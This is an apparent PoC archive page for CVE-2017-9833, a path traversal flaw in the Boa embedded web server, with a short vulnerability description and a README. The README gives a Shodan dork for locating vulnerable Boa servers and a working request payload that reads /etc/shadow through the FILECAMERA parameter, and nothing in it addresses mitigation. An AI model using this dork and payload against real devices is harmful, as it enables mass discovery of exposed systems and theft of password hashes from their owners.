Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2017-9833 PoC — Boa 路径遍历漏洞

Source
Associated Vulnerability
Title:Boa 路径遍历漏洞 (CVE-2017-9833)
Description:Boa是Boa开源的一种适用于嵌入式应用程序的开放源代码。 Boa中存在路径遍历漏洞,该漏洞源于/cgi-bin/wapopen 的 FILECAMERA 变量能够注入路径以读取根目录。
Description
CVE-2017-9833 POC
Readme
# CVE-2017-9833

Reference: https://www.cvedetails.com/cve/CVE-2017-9833/

Shodan dork: ```product:"Boa Web Server" 0.94.14rc21```

Payload: ```/cgi-bin/wapopen/?FILECAMERA=../../etc/shadow```

POC:

![image](https://user-images.githubusercontent.com/101538840/203938194-d29427e9-f8fa-48bf-b909-7b1d16c688fd.png)
File Snapshot

[4.0K] /data/pocs/3c6a5d4c8a364cac824e5c8e1e02c502ec151d0e └── [ 313] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.